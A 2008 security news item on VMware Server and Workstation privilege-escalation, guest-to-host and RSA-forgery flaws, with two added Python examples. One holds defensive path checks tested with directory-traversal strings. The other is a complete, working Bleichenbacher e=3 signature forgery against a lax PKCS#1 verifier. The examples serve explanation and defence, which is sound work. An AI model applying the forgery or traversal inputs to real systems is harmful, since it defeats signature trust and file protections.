VMware Fixes Several Vulnerabilities in its Hypervisor Software
VMware, the market leader in server virtualization, has found and patched seven vulnerabilities in the free edition of its hypervisor. If exploited, they could allow attackers to mount denial-of-service (DoS) attacks, escalate local user privileges and forge RSA signatures, according to VMware.
A DoS attack is an attack on a computer or network intended to stop legitimate, authorized users from reaching its resources.
The flaws affect VMware Server, the company's free server-virtualization product, and are fixed in the newly released version 1.0.5. VMware first announced them on March 17, 2008; Secunia, which published its own advisory, rates them "less critical."
According to a posting on VMware's website, a security audit found an object created with insecure permissions, which a local attacker could exploit to elevate privileges.
The audit also found a second local privilege-escalation flaw involving named pipes: by opening a pipe under their own control and causing a privileged process to connect to it, a local attacker could impersonate that process and so obtain its privileges.
VMware also found a vulnerability in VMware Workstation, which lets several operating systems run side by side on one computer. When Workstation runs on a Windows host, a guest system can reach the host's folders, including creating and modifying executable files in sensitive locations.
Another fix concerns config.ini, a user-writable file from which a privileged process reads the vmx.fullpath variable. Because a non-administrator can edit config.ini and change the path from which the VMX process is launched, a local user could substitute an executable of their own and escalate privileges.
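The two file-system flaws above, a guest reaching host folders it should not see and a privileged launcher trusting a path read from a user-writable config.ini, share one root cause: a privileged component acting on a path it never validated. The Python below is an added example written for this article, not VMware's code. It assumes the guest names a file relative to a folder the host shares with it (the article says only that the guest could reach the host's folders) and that config.ini consists of `key = "value"` lines; both are assumptions. It shows a host-side check that confines a guest-supplied name to the shared folder, and a launcher check that refuses a config file other users can write or a path that leaves the install directory. The fixtures are constructed in a temporary directory.

```python
import os
import stat
import tempfile


def within_root(candidate: str, root: str) -> bool:
    """True if candidate, after '..' and symlink resolution, stays inside root."""
    root_real = os.path.realpath(root)
    cand_real = os.path.realpath(candidate)
    try:
        return os.path.commonpath([root_real, cand_real]) == root_real
    except ValueError:  # different drives on Windows
        return False


def resolve_shared_folder_request(share_root: str, guest_path: str):
    """Host-side check for a guest request to open a file in a shared folder.
    Returns the host path to serve, or None if the name escapes the share."""
    rel = guest_path.replace("\\", "/").lstrip("/")  # guests may send either separator
    host_path = os.path.join(share_root, rel)
    if not within_root(host_path, share_root):
        return None
    return os.path.realpath(host_path)


def read_vmware_style_config(path: str) -> dict:
    """Parse 'key = "value"' lines (assumed layout of config.ini; no sections)."""
    values = {}
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            key, _, val = line.partition("=")
            values[key.strip()] = val.strip().strip('"')
    return values


def trusted_launch_path(config_path: str, install_dir: str) -> str:
    """What a privileged launcher should do before running the path named in a
    config file: refuse a file an unprivileged user could have edited, and refuse
    a path outside the install directory.  The owner/mode checks are POSIX-style;
    on a Windows host the equivalent step is inspecting the file's ACL."""
    st = os.stat(config_path)
    if st.st_uid not in (0, os.geteuid()):
        raise PermissionError("config not owned by root or the launcher")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError("config is group- or world-writable")
    exe = read_vmware_style_config(config_path).get("vmx.fullpath")
    if not exe or not within_root(exe, install_dir):
        raise PermissionError("vmx.fullpath missing or outside the install dir")
    return os.path.realpath(exe)


def _rejects(cfg: str, install: str) -> bool:
    try:
        trusted_launch_path(cfg, install)
    except PermissionError:
        return True
    return False


def demo() -> dict:
    """Exercise both checks on constructed fixtures in a temporary directory."""
    out = {}
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "share")
        os.makedirs(os.path.join(share, "docs"))
        normal = resolve_shared_folder_request(share, "docs\\readme.txt")
        out["normal_ok"] = normal == os.path.realpath(os.path.join(share, "docs", "readme.txt"))
        out["traversal"] = resolve_shared_folder_request(share, "..\\..\\Windows\\System32\\drivers\\etc\\hosts")
        out["mixed"] = resolve_shared_folder_request(share, "docs/../../evil.exe")

        install = os.path.join(tmp, "install")
        os.makedirs(install)
        cfg = os.path.join(tmp, "config.ini")
        good = os.path.join(install, "vmware-vmx")
        with open(cfg, "w", encoding="utf-8") as fh:
            fh.write(f'vmx.fullpath = "{good}"\n')
        os.chmod(cfg, 0o644)
        out["launch_ok"] = trusted_launch_path(cfg, install) == os.path.realpath(good)

        os.chmod(cfg, 0o666)  # now any local user could rewrite the launch path
        out["writable_rejected"] = _rejects(cfg, install)

        os.chmod(cfg, 0o644)
        with open(cfg, "w", encoding="utf-8") as fh:
            fh.write(f'vmx.fullpath = "{os.path.join(tmp, "evil.exe")}"\n')
        out["outside_rejected"] = _rejects(cfg, install)
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Resolving with `realpath` before comparing matters: a naive string check such as "does the joined path start with the share root" is defeated by `..` segments and by symlinks planted inside the share, and the install-directory check on the launcher side closes the same hole from the other end.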
According to VMware, the bug that allowed RSA signatures to be forged was fixed by updating the OpenSSL library bundled with VMware Server. For all of the bugs, VMware recommends upgrading to version 1.0.5.
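The article does not say which OpenSSL flaw allowed signatures to be forged. The best-known one of that period is Bleichenbacher's forgery against implementations whose PKCS#1 v1.5 check does not verify that the DigestInfo fills the rest of the padded block; with public exponent 3 an attacker simply takes an integer cube root and never needs the private key. The Python below is an added example, not VMware's or OpenSSL's code, and it assumes that flaw, a 3072-bit key with e = 3, and a modulus that is just a random odd number constructed here (the forgery is identical against a real one). It shows the lax verifier accepting a forged signature over a constructed message and a strict verifier rejecting it.

```python
import hashlib
import secrets

KEY_BITS = 3072
KEY_BYTES = KEY_BITS // 8
E = 3
# Constructed for this example: a random odd 3072-bit "modulus".  The forgery
# never touches a private key, so a genuine product of two primes would behave
# the same; only the size and the exponent matter.
N = secrets.randbits(KEY_BITS) | (1 << (KEY_BITS - 1)) | 1

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def icbrt_ceil(x: int) -> int:
    """Smallest integer r with r**3 >= x, by binary search on big integers."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 >= x:
            hi = mid
        else:
            lo = mid + 1
    return lo


def rsa_public(sig: int) -> bytes:
    """RSA public operation, returned as a KEY_BYTES-long encoded block."""
    return pow(sig, E, N).to_bytes(KEY_BYTES, "big")


def verify_lenient(msg: bytes, sig: int) -> bool:
    """Flawed PKCS#1 v1.5 check: walks past 00 01 FF..FF 00, compares the
    DigestInfo and hash, and ignores whatever follows.  That trailing slack is
    exactly what the forgery fills."""
    em = rsa_public(sig)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return False
    expected = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(expected)] == expected


def verify_strict(msg: bytes, sig: int) -> bool:
    """Correct check: rebuild the entire expected block and compare all of it."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    pad_len = KEY_BYTES - len(t) - 3
    if pad_len < 8:
        return False
    expected = b"\x00\x01" + b"\xff" * pad_len + b"\x00" + t
    return rsa_public(sig) == expected


def forge_signature(msg: bytes) -> int:
    """Bleichenbacher's e=3 forgery: put the shortest legal padding and the
    DigestInfo at the top of the block, leave the rest zero, and round the
    integer cube root up.  Cubing that root only disturbs the low bits, so the
    prefix the lenient verifier inspects is intact and the cube never wraps
    modulo N."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    target = int.from_bytes(prefix + b"\x00" * (KEY_BYTES - len(prefix)), "big")
    sig = icbrt_ceil(target)
    assert sig ** 3 < N and rsa_public(sig)[:len(prefix)] == prefix
    return sig


def demo(msg: bytes = b"constructed message") -> tuple:
    """Returns (lenient verifier accepts forgery, strict verifier accepts forgery)."""
    sig = forge_signature(msg)
    return verify_lenient(msg, sig), verify_strict(msg, sig)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The difference between the two verifiers is a length check: the strict one reconstructs the whole encoded block and compares it byte for byte, so any slack after the hash is a mismatch rather than ignored bytes an attacker can choose.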
» SPAMfighter News - 25-03-2008